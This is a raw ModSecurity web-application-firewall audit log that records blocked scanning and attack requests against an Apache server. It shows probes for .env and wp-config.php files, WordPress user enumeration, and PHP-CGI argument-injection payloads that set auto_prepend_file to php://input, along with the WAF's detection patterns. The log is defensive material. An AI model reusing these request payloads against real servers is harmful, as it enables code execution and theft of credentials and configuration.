3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745683079791442 4940 (- - -) Stopwatch2: 1745683079791442 4940; combined=3171, p1=469, p2=2663, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73f64249-Z-- --c909737c-A-- [26/Apr/2025:22:58:58 +0700] aA0CwtDEbIDiBZnoTx5zVQAAAFA 103.236.140.4 45456 103.236.140.4 8181 --c909737c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 147.182.149.75 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 147.182.149.75 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c909737c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c909737c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745683138516818 770 (- - -) Stopwatch2: 1745683138516818 770; combined=293, p1=257, p2=0, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c909737c-Z-- --0ee8775e-A-- [27/Apr/2025:01:37:30 +0700] aA0n6k3IXD9XJ6lrmIUqGgAAAAQ 103.236.140.4 57402 103.236.140.4 8181 --0ee8775e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 88.151.34.37 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 88.151.34.37 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --0ee8775e-C-- --0ee8775e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ee8775e-E-- --0ee8775e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745692650641502 5065 (- - -) Stopwatch2: 1745692650641502 5065; combined=4056, p1=488, p2=3535, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ee8775e-Z-- --2840144b-A-- [27/Apr/2025:03:36:26 +0700] aA1DynGCMLWH05JCdxxfjwAAAIY 103.236.140.4 60966 103.236.140.4 8181 --2840144b-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.213.174.118 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.213.174.118 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --2840144b-C-- --2840144b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2840144b-E-- --2840144b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745699786288067 5206 (- - -) Stopwatch2: 1745699786288067 5206; combined=3524, p1=540, p2=2921, p3=0, p4=0, p5=63, sr=127, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2840144b-Z-- --4624a32d-A-- [27/Apr/2025:03:46:28 +0700] aA1GJCKLpK55oNIcEw0Y6AAAAEU 103.236.140.4 35378 103.236.140.4 8181 --4624a32d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.230.154.6 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.230.154.6 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --4624a32d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4624a32d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745700388739139 1044 (- - -) Stopwatch2: 1745700388739139 1044; combined=439, p1=407, p2=0, p3=0, p4=0, p5=32, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4624a32d-Z-- --85ab5858-A-- [27/Apr/2025:04:16:14 +0700] aA1NHiKLpK55oNIcEw0amgAAAE4 103.236.140.4 42190 103.236.140.4 8181 --85ab5858-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --85ab5858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85ab5858-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745702174829350 755 (- - -) Stopwatch2: 1745702174829350 755; combined=312, p1=273, p2=0, p3=0, p4=0, p5=38, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85ab5858-Z-- --eff85831-A-- [27/Apr/2025:04:16:15 +0700] aA1NH_7FMV4FIoAOnu7FjQAAAAE 103.236.140.4 42198 103.236.140.4 8181 --eff85831-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --eff85831-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eff85831-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745702175864969 777 (- - -) Stopwatch2: 1745702175864969 777; combined=304, p1=268, p2=0, p3=0, p4=0, p5=35, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eff85831-Z-- --ea3e3472-A-- [27/Apr/2025:05:12:34 +0700] aA1aUiKLpK55oNIcEw0eBwAAAEc 103.236.140.4 55118 103.236.140.4 8181 --ea3e3472-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00 Accept-Charset: utf-8 --ea3e3472-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea3e3472-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745705554130652 734 (- - -) Stopwatch2: 1745705554130652 734; combined=293, p1=258, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea3e3472-Z-- --1ad1b530-A-- [27/Apr/2025:05:18:49 +0700] aA1byf7FMV4FIoAOnu7KPQAAAAs 103.236.140.4 56546 103.236.140.4 8181 --1ad1b530-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --1ad1b530-C-- --1ad1b530-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad1b530-E-- --1ad1b530-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745705929335810 4124 (- - -) Stopwatch2: 1745705929335810 4124; combined=2649, p1=473, p2=2147, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad1b530-Z-- --e82cf335-A-- [27/Apr/2025:05:23:29 +0700] aA1c4RkilNlaTSHUe098JgAAAJc 103.236.140.4 57610 103.236.140.4 8181 --e82cf335-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9) Accept-Charset: utf-8 --e82cf335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e82cf335-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745706209640835 780 (- - -) Stopwatch2: 1745706209640835 780; combined=304, p1=265, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e82cf335-Z-- --02564919-A-- [27/Apr/2025:05:48:36 +0700] aA1ixMO7TUCRYJ_xflcVYwAAAMI 103.236.140.4 35204 103.236.140.4 8181 --02564919-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --02564919-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02564919-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745707716897223 884 (- - -) Stopwatch2: 1745707716897223 884; combined=360, p1=321, p2=0, p3=0, p4=0, p5=38, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02564919-Z-- --c5d70f1d-A-- [27/Apr/2025:06:10:19 +0700] aA1n28O7TUCRYJ_xflcXPQAAAMI 103.236.140.4 43360 103.236.140.4 8181 --c5d70f1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 Accept-Charset: utf-8 --c5d70f1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5d70f1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745709019994114 802 (- - -) Stopwatch2: 1745709019994114 802; combined=376, p1=346, p2=0, p3=0, p4=0, p5=30, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5d70f1d-Z-- --bfca1c4b-A-- [27/Apr/2025:07:47:51 +0700] aA1-t8O7TUCRYJ_xflce1wAAANI 103.236.140.4 40880 103.236.140.4 8181 --bfca1c4b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 45.206.72.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.206.72.214 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bfca1c4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfca1c4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745714871762539 3062 (- - -) Stopwatch2: 1745714871762539 3062; combined=1373, p1=424, p2=916, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfca1c4b-Z-- --76749f19-A-- [27/Apr/2025:08:13:35 +0700] aA2EvxkilNlaTSHUe0-G5AAAAII 103.236.140.4 46862 103.236.140.4 8181 --76749f19-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --76749f19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76749f19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745716415078615 748 (- - -) Stopwatch2: 1745716415078615 748; combined=313, p1=273, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76749f19-Z-- --a06e260b-A-- [27/Apr/2025:08:14:27 +0700] aA2E88O7TUCRYJ_xflcgJwAAANc 103.236.140.4 47062 103.236.140.4 8181 --a06e260b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: W3C_Validator/1.305.2.12 libwww-perl/5.64 Accept-Charset: utf-8 --a06e260b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a06e260b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745716467081081 834 (- - -) Stopwatch2: 1745716467081081 834; combined=354, p1=313, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a06e260b-Z-- --51398832-A-- [27/Apr/2025:09:13:26 +0700] aA2SxhkilNlaTSHUe0-L5QAAAJM 103.236.140.4 38520 103.236.140.4 8181 --51398832-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.230.154.6 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.230.154.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --51398832-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51398832-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745720006177532 965 (- - -) Stopwatch2: 1745720006177532 965; combined=403, p1=350, p2=0, p3=0, p4=0, p5=52, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51398832-Z-- --28570e5e-A-- [27/Apr/2025:09:42:48 +0700] aA2ZqP7FMV4FIoAOnu7e4wAAABc 103.236.140.4 45382 103.236.140.4 8181 --28570e5e-B-- GET /wp-config.php2 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --28570e5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28570e5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721768237064 870 (- - -) Stopwatch2: 1745721768237064 870; combined=376, p1=335, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28570e5e-Z-- --2e63ed5a-A-- [27/Apr/2025:09:42:48 +0700] aA2ZqMO7TUCRYJ_xflcmygAAAMo 103.236.140.4 45384 103.236.140.4 8181 --2e63ed5a-B-- GET /wp-config.php3 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --2e63ed5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e63ed5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721768771390 857 (- - -) Stopwatch2: 1745721768771390 857; combined=358, p1=310, p2=0, p3=0, p4=0, p5=48, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e63ed5a-Z-- --fc9d9b03-A-- [27/Apr/2025:09:42:49 +0700] aA2ZqRkilNlaTSHUe0-NjQAAAIs 103.236.140.4 45390 103.236.140.4 8181 --fc9d9b03-B-- GET /wp-config.php4 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --fc9d9b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc9d9b03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721769653253 826 (- - -) Stopwatch2: 1745721769653253 826; combined=352, p1=316, p2=0, p3=0, p4=0, p5=36, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc9d9b03-Z-- --bb9b263f-A-- 